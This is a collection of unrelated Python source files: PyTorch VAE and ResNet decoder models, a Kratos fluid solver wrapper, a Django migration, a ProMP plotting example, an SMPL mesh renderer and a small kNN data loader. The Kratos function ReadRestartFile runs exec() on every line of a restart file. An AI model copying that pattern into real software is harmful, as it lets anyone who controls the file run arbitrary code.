normal_init(self._modules[m], mean, std)
def reparametrize(self, mu, sigma):
std = sigma.mul(.5).exp_()
if torch.cuda.is_available():
eps = torch.cuda.FloatTensor(std.size()).normal_()
else:
eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu)
def generate(self, z, label):
x0 = self.unembedder(z)
x1 = self.label_input(label)
x = torch.cat([x0, x1], 1)
x = self.hidden1(x)
x = self.hidden2(x)
x = self.hidden3(x)
x0 = self.hidden4_dropout(x)
x0 = self.out_dropout(x0)
x1 = self.hidden4_noise(x)
x1 = self.out_noise(x1)
x = torch.cat([x0, x1], 1)
return x
def forward(self, mu, sigma, label):
# reparametrization trick
z = self.reparametrize(mu, sigma)
z = nn.functional.normalize(z, p=2, dim=1)
x = self.generate(z, label)
return x
class Unpool(nn.Module):
# Unpool: 2*2 unpooling with zero padding
def __init__(self, num_channels, stride=2):
super(Unpool, self).__init__()
self.num_channels = num_channels
self.stride = stride
# create kernel [1, 0; 0, 0]
self.weights = torch.autograd.Variable(torch.zeros(num_channels, 1, stride, stride).cuda()) # currently not compatible with running on CPU
self.weights[:,:,0,0] = 1
def forward(self, x):
return F.conv_transpose2d(x, self.weights, stride=self.stride, groups=self.num_channels)
def weights_init(m):
# Initialize filters with Gaussian random weights
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.ConvTranspose2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.in_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class Decoder(nn.Module):
# Decoder is the base class for all decoders
names = ['deconv2', 'deconv3', 'deconv5', 'deconv8', 'upconv', 'upproj']
def __init__(self):
super(Decoder, self).__init__()
self.layer1 = None
self.layer2 = None
self.layer3 = None
self.layer4 = None
self.layer5 = None
self.skip4_pad = nn.ZeroPad2d((1,0,1,0))
self.skip3_pad = nn.ZeroPad2d((1,1,2,1))
self.skip2_pad = nn.ZeroPad2d((2,2,4,3))
self.skip1_pad = nn.ZeroPad2d((4,4,7,7))
def forward(self, x, skip1=None, skip2=None, skip3=None, skip4=None):
skip4 = self.skip4_pad(skip4)
skip3 = self.skip3_pad(skip3)
skip2 = self.skip2_pad(skip2)
skip1 = self.skip1_pad(skip1)
x = self.layer1(x) # connects to skip4
x = torch.cat((x, skip4), 1)
x = self.layer2(x) # connects to skip3
x = torch.cat((x, skip3), 1)
x = self.layer3(x) # connects to x skip2
x = torch.cat((x, skip2), 1)
x = self.layer4(x)
x = torch.cat((x, skip1), 1)
x = self.layer5(x)
return x
class DeConv(Decoder):
def __init__(self, in_channels, kernel_size):
assert kernel_size>=2, "kernel_size out of range: {}".format(kernel_size)
super(DeConv, self).__init__()
def convt(in_channels, out_channels=None):
stride = 2
padding = (kernel_size - 1) // 2
output_padding = kernel_size % 2
assert -2 - 2*padding + kernel_size + output_padding == 0, "deconv parameters incorrect"
module_name = "deconv{}".format(kernel_size)
out_channels = in_channels//2 if out_channels is None else out_channels
return nn.Sequential(collections.OrderedDict([
(module_name, nn.ConvTranspose2d(in_channels,out_channels,kernel_size,
stride,padding,output_padding,bias=False)),
('batchnorm', nn.BatchNorm2d(out_channels)),
('relu', nn.ReLU(inplace=True)),
]))
self.layer1 = convt(in_channels, in_channels // 2)
self.layer2 = convt(in_channels, in_channels // (2 ** 2))
self.layer3 = convt(in_channels // 2, in_channels // (2 ** 3))
self.layer4 = convt(in_channels // (2 ** 2), in_channels // (2 ** 3))
self.layer5 = convt(in_channels // (2 ** 2), in_channels // (2 ** 4))
# self.layer3 = convt(in_channels // (2 ** 2))
# self.layer4 = convt(in_channels // (2 ** 3))
# self.layer5 = convt(in_channels // (2 ** 4))
class UpConv(Decoder):
# UpConv decoder consists of 4 upconv modules with decreasing number of channels and increasing feature map size
def upconv_module(self, in_channels):
# UpConv module: unpool -> 5*5 conv -> batchnorm -> ReLU
upconv = nn.Sequential(collections.OrderedDict([
('unpool', Unpool(in_channels)),
('conv', nn.Conv2d(in_channels,in_channels//2,kernel_size=5,stride=1,padding=2,bias=False)),
('batchnorm', nn.BatchNorm2d(in_channels//2)),
('relu', nn.ReLU()),
]))
return upconv
def __init__(self, in_channels):
super(UpConv, self).__init__()
self.layer1 = self.upconv_module(in_channels)
self.layer2 = self.upconv_module(in_channels//2)
self.layer3 = self.upconv_module(in_channels//4)
self.layer4 = self.upconv_module(in_channels//8)
class UpProj(Decoder):
# UpProj decoder consists of 4 upproj modules with decreasing number of channels and increasing feature map size
class UpProjModule(nn.Module):
# UpProj module has two branches, with a Unpool at the start and a ReLu at the end
# upper branch: 5*5 conv -> batchnorm -> ReLU -> 3*3 conv -> batchnorm
# bottom branch: 5*5 conv -> batchnorm
def __init__(self, in_channels):
super(UpProj.UpProjModule, self).__init__()
out_channels = in_channels//2
self.unpool = Unpool(in_channels)
self.upper_branch = nn.Sequential(collections.OrderedDict([
('conv1', nn.Conv2d(in_channels,out_channels,kernel_size=5,stride=1,padding=2,bias=False)),
('batchnorm1', nn.BatchNorm2d(out_channels)),
('relu', nn.ReLU()),
('conv2', nn.Conv2d(out_channels,out_channels,kernel_size=3,stride=1,padding=1,bias=False)),
('batchnorm2', nn.BatchNorm2d(out_channels)),
]))
self.bottom_branch = nn.Sequential(collections.OrderedDict([
('conv', nn.Conv2d(in_channels,out_channels,kernel_size=5,stride=1,padding=2,bias=False)),
('batchnorm', nn.BatchNorm2d(out_channels)),
]))
self.relu = nn.ReLU()
def forward(self, x):
x = self.unpool(x)
x1 = self.upper_branch(x)
x2 = self.bottom_branch(x)
x = x1 + x2
x = self.relu(x)
return x
def __init__(self, in_channels):
super(UpProj, self).__init__()
self.layer1 = self.UpProjModule(in_channels)
self.layer2 = self.UpProjModule(in_channels//2)
self.layer3 = self.UpProjModule(in_channels//4)
self.layer4 = self.UpProjModule(in_channels//8)
def choose_decoder(decoder, in_channels):
# iheight, iwidth = 10, 8
if decoder[:6] == 'deconv':
assert len(decoder)==7
kernel_size = int(decoder[6])
return DeConv(in_channels, kernel_size)
elif decoder == "upproj":
return UpProj(in_channels)
elif decoder == "upconv":
return UpConv(in_channels)
else:
assert False, "invalid option for decoder: {}".format(decoder)
class ResNet(nn.Module):
def __init__(self, layers, decoder, output_size, in_channels=3, pretrained=True):
if layers not in [18, 34, 50, 101, 152]:
raise RuntimeError('Only 18, 34, 50, 101, and 152 layer model are defined for ResNet. Got {}'.format(layers))
super(ResNet, self).__init__()
pretrained_model = torchvision.models.__dict__['resnet{}'.format(layers)](pretrained=pretrained)
if in_channels == 3:
self.conv1 = pretrained_model._modules['conv1']
self.bn1 = pretrained_model._modules['bn1']
else:
self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
weights_init(self.conv1)
weights_init(self.bn1)
self.output_size = output_size
self.relu = pretrained_model._modules['relu']
self.maxpool = pretrained_model._modules['maxpool']
self.layer1 = pretrained_model._modules['layer1']
self.layer2 = pretrained_model._modules['layer2']
self.layer3 = pretrained_model._modules['layer3']
self.layer4 = pretrained_model._modules['layer4']
# clear memory
del pretrained_model
# define number of intermediate channels
if layers <= 34:
num_channels = 512
elif layers >= 50:
num_channels = 2048
# self.conv2 = nn.Conv2d(num_channels,num_channels//2,kernel_size=1,bias=False)
# self.bn2 = nn.BatchNorm2d(num_channels//2)
# self.decoder = choose_decoder(decoder, num_channels//2)
self.conv2 = nn.Conv2d(num_channels,num_channels,kernel_size=1,bias=False)
self.bn2 = nn.BatchNorm2d(num_channels)
self.decoder = choose_decoder(decoder, num_channels)
# setting bias=true doesn't improve accuracy
# self.conv3 = nn.Conv2d(num_channels//32,1,kernel_size=3,stride=1,padding=1,bias=False)
self.conv3 = nn.Conv2d(num_channels//16,1,kernel_size=3,stride=1,padding=1,bias=False)
# self.conv3 = nn.Conv2d(num_channels//64,1,kernel_size=3,stride=1,padding=1,bias=False)
self.bilinear = nn.Upsample(size=self.output_size, mode='bilinear', align_corners=True)
# weight init
self.conv2.apply(weights_init)
self.bn2.apply(weights_init)
self.decoder.apply(weights_init)
self.conv3.apply(weights_init)
def forward(self, x):
# resnet
x1 = self.conv1(x)
x = self.bn1(x1)
x = self.relu(x)
x = self.maxpool(x)
x2 = self.layer1(x)
x3 = self.layer2(x2)
x4 = self.layer3(x3)
x = self.layer4(x4)
x = self.conv2(x)
x = self.bn2(x)
# decoder
x = self.decoder(x, x1, x2, x3, x4)
x = self.conv3(x)
x = self.bilinear(x)
return x
|
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# -*- coding: utf-8 -*-
# importing the Kratos Library
from KratosMultiphysics import *
from KratosMultiphysics.IncompressibleFluidApplication import *
# Check that KratosMultiphysics was imported in the main script
CheckForPreviousImport()
def AddVariables(model_part):
model_part.AddNodalSolutionStepVariable(VELOCITY)
model_part.AddNodalSolutionStepVariable(FRACT_VEL)
model_part.AddNodalSolutionStepVariable(MESH_VELOCITY)
model_part.AddNodalSolutionStepVariable(PRESSURE)
model_part.AddNodalSolutionStepVariable(PRESSURE_OLD_IT)
model_part.AddNodalSolutionStepVariable(PRESS_PROJ)
model_part.AddNodalSolutionStepVariable(CONV_PROJ)
model_part.AddNodalSolutionStepVariable(NODAL_MASS)
model_part.AddNodalSolutionStepVariable(BODY_FORCE)
model_part.AddNodalSolutionStepVariable(DENSITY)
model_part.AddNodalSolutionStepVariable(VISCOSITY)
model_part.AddNodalSolutionStepVariable(EXTERNAL_PRESSURE)
model_part.AddNodalSolutionStepVariable(FLAG_VARIABLE)
model_part.AddNodalSolutionStepVariable(DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(IS_STRUCTURE)
model_part.AddNodalSolutionStepVariable(IS_INTERFACE)
model_part.AddNodalSolutionStepVariable(ARRHENIUS)
print("variables for the incompressible fluid solver added correctly")
def AddDofs(model_part):
for node in model_part.Nodes:
# adding dofs
node.AddDof(PRESSURE)
node.AddDof(FRACT_VEL_X)
node.AddDof(FRACT_VEL_Y)
node.AddDof(FRACT_VEL_Z)
node.AddDof(VELOCITY_X)
node.AddDof(VELOCITY_Y)
node.AddDof(VELOCITY_Z)
print("dofs for the incompressible fluid solver added correctly")
# def ReadRestartFile(FileName,nodes):
# aaa = __import__(FileName)
# aaa.Restart(nodes)
def ReadRestartFile(FileName, nodes):
NODES = nodes
aaa = open(FileName)
for line in aaa:
exec(line)
# import start.pyinc
# aaa = __import__(FileName)
# aaa.Restart(nodes)
class IncompressibleFluidSolver:
def __init__(self, model_part, domain_size):
# neighbour search
number_of_avg_elems = 10
number_of_avg_nodes = 10
self.neighbour_search = FindNodalNeighboursProcess(
model_part, number_of_avg_elems, number_of_avg_nodes)
self.model_part = model_part
self.domain_size = domain_size
# assignation of parameters to be used
self.vel_toll = 0.001
self.press_toll = 0.001
self.max_vel_its = 6
self.max_press_its = 3
self.time_order = 2
self.CalculateReactions = False
self.ReformDofAtEachIteration = False
self.CalculateNormDxFlag = True
self.laplacian_form = 2
# 1 = laplacian, 2 = Discrete Laplacian
self.predictor_corrector = False
self.echo_level = 0
# definition of the solvers
pDiagPrecond = DiagonalPreconditioner()
# pILUPrecond = ILU0Preconditioner()
# self.velocity_linear_solver = BICGSTABSolver(1e-6, 5000,pDiagPrecond)
# self.pressure_linear_solver = BICGSTABSolver(1e-9, 5000,pILUPrecond)
self.velocity_linear_solver = BICGSTABSolver(1e-6, 5000, pDiagPrecond)
# self.pressure_linear_solver = BICGSTABSolver(1e-3, 5000,pILUPrecond)
self.pressure_linear_solver = BICGSTABSolver(1e-3, 5000, pDiagPrecond)
self.dynamic_tau = 0.001
self.activate_tau2 = False
# handling slip condition
self.slip_conditions_initialized = False
self.create_slip_conditions = GenerateSlipConditionProcess(
self.model_part, domain_size)
self.compute_reactions = False
def Initialize(self):
(self.neighbour_search).Execute()
self.model_part.ProcessInfo.SetValue(DYNAMIC_TAU, self.dynamic_tau)
self.model_part.ProcessInfo.SetValue(
ACTIVATE_TAU2, self.activate_tau2)
self.domain_size = int(self.domain_size)
self.laplacian_form = int(self.laplacian_form)
self.solver_configuration = FractionalStepConfiguration(
self.model_part,
self.velocity_linear_solver,
self.pressure_linear_solver,
self.domain_size,
self.laplacian_form)
self.ReformDofAtEachIteration = bool(self.ReformDofAtEachIteration)
self.vel_toll = float(self.vel_toll)
self.press_toll = float(self.press_toll)
self.max_vel_its = int(self.max_vel_its)
self.max_press_its = int(self.max_press_its)
self.time_order = int(self.time_order)
self.domain_size = int(self.domain_size)
self.predictor_corrector = bool(self.predictor_corrector)
self.solver = FractionalStepStrategy(
self.model_part,
self.solver_configuration,
self.ReformDofAtEachIteration,
self.vel_toll,
self.press_toll,
self.max_vel_its,
self.max_press_its,
self.time_order,
self.domain_size,
self.predictor_corrector)
self.solver.Check()
self.solver.ApplyFractionalVelocityFixity()
# generating the slip conditions
self.create_slip_conditions.Execute()
(self.solver).SetSlipProcess(self.create_slip_conditions)
self.slip_conditions_initialized = True
(self.solver).SetEchoLevel(self.echo_level)
print("finished initialization of the fluid strategy")
def Solve(self):
if(self.ReformDofAtEachIteration):
self.solver.ApplyFractionalVelocityFixity()
(self.neighbour_search).Execute()
self.slip_conditions_initialized = False
if(self.slip_conditions_initialized == False):
self.create_slip_conditions.Execute()
(self.solver).SetSlipProcess(self.create_slip_conditions)
self.slip_conditions_initialized = True
print("just before solve")
print(self.model_part)
(self.solver).Solve()
if(self.compute_reactions):
self.solver.ComputeReactions(REACTION)
# (self.create_slip_conditions).SetNormalVelocityToZero()
# (self.create_slip_conditions).ApplyEdgeConstraints()
def Clear(self):
(self.solver).Clear()
self.slip_conditions_initialized = True
def AdaptMesh(self):
import KratosMultiphysics.MeshingApplication as KMesh
admissible_ratio = 0.05
max_levels = 2
refinement_utils = KMesh.RefinementUtilities()
if(self.domain_size == 2):
raise "error refine in 2d not yet implemented"
else:
Refine = KMesh.LocalRefineTetrahedraMesh(self.model_part)
# just to be sure nothign is done
(self.model_part).ProcessInfo[FRACTIONAL_STEP] = 10
refinement_utils.MarkForRefinement(
ERROR_RATIO,
self.model_part,
admissible_ratio,
max_levels)
self.Clear()
refine_on_reference = False
interpolate_internal_variables = False
Refine.LocalRefineMesh(
refine_on_reference,
interpolate_internal_variables)
(self.neighbour_search).Execute()
self.slip_conditions_initialized = False
print("Refining finished")
def WriteRestartFile(self, FileName):
restart_file = open(FileName + ".mdpa", 'w')
import new_restart_utilities
new_restart_utilities.PrintProperties(restart_file)
new_restart_utilities.PrintNodes(self.model_part.Nodes, restart_file)
new_restart_utilities.PrintElements(
"Fluid3D",
self.model_part.Elements,
restart_file)
new_restart_utilities.PrintRestart_ScalarVariable(
VELOCITY_X,
"VELOCITY_X",
self.model_part.Nodes,
restart_file)
new_restart_utilities.PrintRestart_ScalarVariable(
VELOCITY_Y,
"VELOCITY_Y",
self.model_part.Nodes,
restart_file)
new_restart_utilities.PrintRestart_ScalarVariable(
VELOCITY_Z,
"VELOCITY_Z",
self.model_part.Nodes,
restart_file)
new_restart_utilities.PrintRestart_ScalarVariable(
PRESSURE,
"PRESSURE",
self.model_part.Nodes,
restart_file)
new_restart_utilities.PrintRestart_ScalarVariable(
VISCOSITY,
"VISCOSITY",
self.model_part.Nodes,
restart_file)
new_restart_utilities.PrintRestart_ScalarVariable(
DENSITY,
"DENSITY",
self.model_part.Nodes,
restart_file)
restart_file.close()
def ActivateSmagorinsky(self, C):
for elem in self.model_part.Elements:
elem.SetValue(C_SMAGORINSKY, C)
def ActivateSpalartAllmaras(self, wall_nodes, DES, CDES=1.0):
import KratosMultiphysics.FluidDynamicsApplication as KCFD
for node in wall_nodes:
node.SetValue(IS_VISITED, 1.0)
distance_calculator = BodyDistanceCalculationUtils()
distance_calculator.CalculateDistances2D(
self.model_part.Elements, DISTANCE, 100.0)
non_linear_tol = 0.001
max_it = 10
reform_dofset = self.ReformDofAtEachIteration
time_order = self.time_order
pPrecond = DiagonalPreconditioner()
turbulence_linear_solver = BICGSTABSolver(1e-20, 5000, pPrecond)
turbulence_model = KCFD.SpalartAllmarasTurbulenceModel(
self.model_part,
turbulence_linear_solver,
self.domain_size,
non_linear_tol,
max_it,
reform_dofset,
time_order)
turbulence_model.AdaptForFractionalStep()
if(DES):
turbulence_model.ActivateDES(CDES)
self.solver.AddInitializeIterationProcess(turbulence_model)
|
"""Data conversion module
This module provides functions to
convert between data formats.
"""
|
#!/usr/bin/env python3
from taxtree.tree import createTree
tree = createTree([
(88, 2, [1, 2, 3, 4, 5]),
(66, 80, [1, 12, 13, 14, 15]),
(99, 40, [200, 22, 23, 24, 25]),
(96, 2, [1, 12, 230, 34, 45]),
(87, 1, [2000, 20, 30, 40, 50]),
])
print(tree)
tree.shake(.2)
print(tree)
print("lowest common node:")
print(tree.lowestCommonNode())
print("possible outlier:")
print(tree.potentialOutlier())
# print(tree.root)
# for i in [1, 200, 2000]:
# print("----------")
# tree.trim(tree.catalog[i])
# print(tree.root)
#
# tree.trim()
# print(tree)
#
# tree.trim()
# print(tree)
#
# tree.trim()
# print(tree)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-06-16 07:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rbac', '0006_menu_weight'),
]
operations = [
migrations.AddField(
model_name='permission',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='rbac.Permission'),
),
]
|
"""
============================
LASA Handwriting with ProMPs
============================
The LASA Handwriting dataset learned with ProMPs. The dataset consists of
2D handwriting motions. The first and third column of the plot represent
demonstrations and the second and fourth column show the imitated ProMPs
with 1-sigma interval.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from movement_primitives.data import load_lasa
from movement_primitives.promp import ProMP
def draw(T, X, idx, axes, shape_name):
h = int(idx / width)
w = int(idx % width) * 2
axes[h, w].set_title(shape_name)
axes[h, w].plot(X[:, :, 0].T, X[:, :, 1].T)
promp = ProMP(n_weights_per_dim=30, n_dims=X.shape[2])
promp.imitate(T, X)
mean = promp.mean_trajectory(T[0])
std = np.sqrt(promp.var_trajectory(T[0]))
axes[h, w + 1].plot(mean[:, 0], mean[:, 1], c="r")
axes[h, w + 1].plot(mean[:, 0] - std[:, 0], mean[:, 1] - std[:, 1], c="g")
axes[h, w + 1].plot(mean[:, 0] + std[:, 0], mean[:, 1] + std[:, 1], c="g")
axes[h, w + 1].set_xlim(axes[h, w].get_xlim())
axes[h, w + 1].set_ylim(axes[h, w].get_ylim())
axes[h, w].get_yaxis().set_visible(False)
axes[h, w].get_xaxis().set_visible(False)
axes[h, w + 1].get_yaxis().set_visible(False)
axes[h, w + 1].get_xaxis().set_visible(False)
width = 2
height = 5
fig, axes = plt.subplots(int(height), int(width * 2))
for i in range(width * height):
T, X, Xd, Xdd, dt, shape_name = load_lasa(i)
draw(T, X, i, axes, shape_name)
plt.tight_layout()
plt.show()
|
"""
Renders mesh using OpenDr for visualization.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
from opendr.camera import ProjectPoints
from opendr.renderer import ColoredRenderer
from opendr.lighting import LambertianPointLight
colors = {
# colorbline/print/copy safe:
'light_blue': [0.65098039, 0.74117647, 0.85882353],
'light_pink': [.9, .7, .7], # This is used to do no-3d
}
class SMPLRenderer(object):
def __init__(self,
img_size=224,
flength=500.,
face_path="tf_smpl/smpl_faces.npy"):
self.faces = np.load(face_path)
self.w = img_size
self.h = img_size
self.flength = flength
def __call__(self,
verts,
cam=None,
img=None,
do_alpha=False,
far=None,
near=None,
color_id=0,
img_size=None):
"""
cam is 3D [f, px, py]
"""
if img is not None:
h, w = img.shape[:2]
elif img_size is not None:
h = img_size[0]
w = img_size[1]
else:
h = self.h
w = self.w
if cam is None:
cam = [self.flength, w / 2., h / 2.]
use_cam = ProjectPoints(
f=cam[0] * np.ones(2),
rt=np.zeros(3),
t=np.zeros(3),
k=np.zeros(5),
c=cam[1:3])
if near is None:
near = np.maximum(np.min(verts[:, 2]) - 25, 0.1)
if far is None:
far = np.maximum(np.max(verts[:, 2]) + 25, 25)
imtmp = render_model(
verts,
self.faces,
w,
h,
use_cam,
do_alpha=do_alpha,
img=img,
far=far,
near=near,
color_id=color_id)
return (imtmp * 255).astype('uint8')
def rotated(self,
verts,
deg,
cam=None,
axis='y',
img=None,
do_alpha=True,
far=None,
near=None,
color_id=0,
img_size=None):
import math
if axis == 'y':
around = cv2.Rodrigues(np.array([0, math.radians(deg), 0]))[0]
elif axis == 'x':
around = cv2.Rodrigues(np.array([math.radians(deg), 0, 0]))[0]
else:
around = cv2.Rodrigues(np.array([0, 0, math.radians(deg)]))[0]
center = verts.mean(axis=0)
new_v = np.dot((verts - center), around) + center
return self.__call__(
new_v,
cam,
img=img,
do_alpha=do_alpha,
far=far,
near=near,
img_size=img_size,
color_id=color_id)
def _create_renderer(w=640,
h=480,
rt=np.zeros(3),
t=np.zeros(3),
f=None,
c=None,
k=None,
near=.5,
far=10.):
f = np.array([w, w]) / 2. if f is None else f
c = np.array([w, h]) / 2. if c is None else c
k = np.zeros(5) if k is None else k
rn = ColoredRenderer()
rn.camera = ProjectPoints(rt=rt, t=t, f=f, c=c, k=k)
rn.frustum = {'near': near, 'far': far, 'height': h, 'width': w}
return rn
def _rotateY(points, angle):
"""Rotate the points by a specified angle."""
ry = np.array([[np.cos(angle), 0., np.sin(angle)], [0., 1., 0.],
[-np.sin(angle), 0., np.cos(angle)]])
return np.dot(points, ry)
def simple_renderer(rn,
verts,
faces,
yrot=np.radians(120),
color=colors['light_pink']):
# Rendered model color
rn.set(v=verts, f=faces, vc=color, bgcolor=np.ones(3))
albedo = rn.vc
# Construct Back Light (on back right corner)
rn.vc = LambertianPointLight(
f=rn.f,
v=rn.v,
num_verts=len(rn.v),
light_pos=_rotateY(np.array([-200, -100, -100]), yrot),
vc=albedo,
light_color=np.array([1, 1, 1]))
# Construct Left Light
rn.vc += LambertianPointLight(
f=rn.f,
v=rn.v,
num_verts=len(rn.v),
light_pos=_rotateY(np.array([800, 10, 300]), yrot),
vc=albedo,
light_color=np.array([1, 1, 1]))
# Construct Right Light
rn.vc += LambertianPointLight(
f=rn.f,
v=rn.v,
num_verts=len(rn.v),
light_pos=_rotateY(np.array([-500, 500, 1000]), yrot),
vc=albedo,
light_color=np.array([.7, .7, .7]))
return rn.r
def get_alpha(imtmp, bgval=1.):
h, w = imtmp.shape[:2]
alpha = (~np.all(imtmp == bgval, axis=2)).astype(imtmp.dtype)
b_channel, g_channel, r_channel = cv2.split(imtmp)
im_RGBA = cv2.merge((b_channel, g_channel, r_channel, alpha.astype(
imtmp.dtype)))
return im_RGBA
def append_alpha(imtmp):
alpha = np.ones_like(imtmp[:, :, 0]).astype(imtmp.dtype)
if np.issubdtype(imtmp.dtype, np.uint8):
alpha = alpha * 255
b_channel, g_channel, r_channel = cv2.split(imtmp)
im_RGBA = cv2.merge((b_channel, g_channel, r_channel, alpha))
return im_RGBA
def render_model(verts,
faces,
w,
h,
cam,
near=0.5,
far=25,
img=None,
do_alpha=False,
color_id=None):
rn = _create_renderer(
w=w, h=h, near=near, far=far, rt=cam.rt, t=cam.t, f=cam.f, c=cam.c)
# Uses img as background, otherwise white background.
if img is not None:
rn.background_image = img / 255. if img.max() > 1 else img
if color_id is None:
color = colors['light_blue']
else:
color_list = colors.values()
color = color_list[color_id % len(color_list)]
imtmp = simple_renderer(rn, verts, faces, color=color)
# If white bg, make transparent.
if img is None and do_alpha:
imtmp = get_alpha(imtmp)
elif img is not None and do_alpha:
imtmp = append_alpha(imtmp)
return imtmp
# ------------------------------
def get_original(proc_param, verts, cam, joints, img_size):
img_size = proc_param['img_size']
undo_scale = 1. / np.array(proc_param['scale'])
cam_s = cam[0]
cam_pos = cam[1:]
principal_pt = np.array([img_size, img_size]) / 2.
flength = 500.
tz = flength / (0.5 * img_size * cam_s)
trans = np.hstack([cam_pos, tz])
vert_shifted = verts + trans
start_pt = proc_param['start_pt'] - 0.5 * img_size
final_principal_pt = (principal_pt + start_pt) * undo_scale
cam_for_render = np.hstack(
[np.mean(flength * undo_scale), final_principal_pt])
# This is in padded image.
# kp_original = (joints + proc_param['start_pt']) * undo_scale
# Subtract padding from joints.
margin = int(img_size / 2)
kp_original = (joints + proc_param['start_pt'] - margin) * undo_scale
return cam_for_render, vert_shifted, kp_original
def draw_skeleton(input_image, joints, draw_edges=True, vis=None, radius=None):
"""
joints is 3 x 19. but if not will transpose it.
0: Right ankle
1: Right knee
2: Right hip
3: Left hip
4: Left knee
5: Left ankle
6: Right wrist
7: Right elbow
8: Right shoulder
9: Left shoulder
10: Left elbow
11: Left wrist
12: Neck
13: Head top
14: nose
15: left_eye
16: right_eye
17: left_ear
18: right_ear
"""
import numpy as np
import cv2
if radius is None:
radius = max(4, (np.mean(input_image.shape[:2]) * 0.01).astype(int))
colors = {
'pink': np.array([197, 27, 125]), # L lower leg
'light_pink': np.array([233, 163, 201]), # L upper leg
'light_green': np.array([161, 215, 106]), # L lower arm
'green': np.array([77, 146, 33]), # L upper arm
'red': np.array([215, 48, 39]), # head
'light_red': np.array([252, 146, 114]), # head
'light_orange': np.array([252, 141, 89]), # chest
'purple': np.array([118, 42, 131]), # R lower leg
'light_purple': np.array([175, 141, 195]), # R upper
'light_blue': np.array([145, 191, 219]), # R lower arm
'blue': np.array([69, 117, 180]), # R upper arm
'gray': np.array([130, 130, 130]), #
'white': np.array([255, 255, 255]), #
}
image = input_image.copy()
input_is_float = False
if np.issubdtype(image.dtype, np.float):
input_is_float = True
max_val = image.max()
if max_val <= 2.: # should be 1 but sometimes it's slightly above 1
image = (image * 255).astype(np.uint8)
else:
image = (image).astype(np.uint8)
if joints.shape[0] != 2:
joints = joints.T
joints = np.round(joints).astype(int)
jcolors = [
'light_pink', 'light_pink', 'light_pink', 'pink', 'pink', 'pink',
'light_blue', 'light_blue', 'light_blue', 'blue', 'blue', 'blue',
'purple', 'purple', 'red', 'green', 'green', 'white', 'white'
]
if joints.shape[1] == 19:
# parent indices -1 means no parents
parents = np.array([
1, 2, 8, 9, 3, 4, 7, 8, 12, 12, 9, 10, 14, -1, 13, -1, -1, 15, 16
])
# Left is light and right is dark
ecolors = {
0: 'light_pink',
1: 'light_pink',
2: 'light_pink',
3: 'pink',
4: 'pink',
5: 'pink',
6: 'light_blue',
7: 'light_blue',
8: 'light_blue',
9: 'blue',
10: 'blue',
11: 'blue',
12: 'purple',
17: 'light_green',
18: 'light_green',
14: 'purple'
}
elif joints.shape[1] == 19:
parents = np.array([
1,
2,
8,
9,
3,
4,
7,
8,
-1,
-1,
9,
10,
13,
-1,
])
ecolors = {
0: 'light_pink',
1: 'light_pink',
2: 'light_pink',
3: 'pink',
4: 'pink',
5: 'pink',
6: 'light_blue',
7: 'light_blue',
10: 'light_blue',
11: 'blue',
12: 'purple'
}
else:
print('Unknown skeleton!!')
import ipdb
ipdb.set_trace()
for child in xrange(len(parents)):
point = joints[:, child]
# If invisible skip
if vis is not None and vis[child] == 0:
continue
if draw_edges:
cv2.circle(image, (point[0], point[1]), radius, colors['white'],
-1)
cv2.circle(image, (point[0], point[1]), radius - 1,
colors[jcolors[child]], -1)
else:
# cv2.circle(image, (point[0], point[1]), 5, colors['white'], 1)
cv2.circle(image, (point[0], point[1]), radius - 1,
colors[jcolors[child]], 1)
# cv2.circle(image, (point[0], point[1]), 5, colors['gray'], -1)
pa_id = parents[child]
if draw_edges and pa_id >= 0:
if vis is not None and vis[pa_id] == 0:
continue
point_pa = joints[:, pa_id]
cv2.circle(image, (point_pa[0], point_pa[1]), radius - 1,
colors[jcolors[pa_id]], -1)
if child not in ecolors.keys():
print('bad')
import ipdb
ipdb.set_trace()
cv2.line(image, (point[0], point[1]), (point_pa[0], point_pa[1]),
colors[ecolors[child]], radius - 2)
# Convert back in original dtype
if input_is_float:
if max_val <= 1.:
image = image.astype(np.float32) / 255.
else:
image = image.astype(np.float32)
return image
def draw_text(input_image, content):
"""
content is a dict. draws key: val on image
Assumes key is str, val is float
"""
import numpy as np
import cv2
image = input_image.copy()
input_is_float = False
if np.issubdtype(image.dtype, np.float):
input_is_float = True
image = (image * 255).astype(np.uint8)
black = np.array([0, 0, 0])
margin = 15
start_x = 5
start_y = margin
for key in sorted(content.keys()):
text = "%s: %.2g" % (key, content[key])
cv2.putText(image, text, (start_x, start_y), 0, 0.45, black)
start_y += margin
if input_is_float:
image = image.astype(np.float32) / 255.
return image
|
from numpy import *
import matplotlib
import matplotlib.pyplot as plt
def file2matrix(filename):
fr = open(filename)
arrayOLines = fr.readlines()
numberOfLines = len(arrayOLines) #get file total lines
returnMat = zeros((numberOfLines, 3)) #create matrix
classLabelVector = []
index = 0
#parse file
for line in arrayOLines:
line = line.strip()
listFromLine = line.split("\t")
returnMat[index, :] = listFromLine[0:3]
intLabel = 1;
if listFromLine[-1] == 'largeDoses':
intLabel = 3
elif listFromLine[-1] == 'smallDoses':
intLabel = 2
classLabelVector.append(intLabel)
index += 1
return returnMat, classLabelVector
if __name__ == "__main__":
datingDataMat, datingLabels = file2matrix("./datingTestSet.txt")
print datingDataMat
print "===================="
print datingLabels
#Mat convert to scattergram
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(datingDataMat[:, 0], datingDataMat[:, 1],
15.0*array(datingLabels), 15.0*array(datingLabels))
plt.show() |
from django import forms
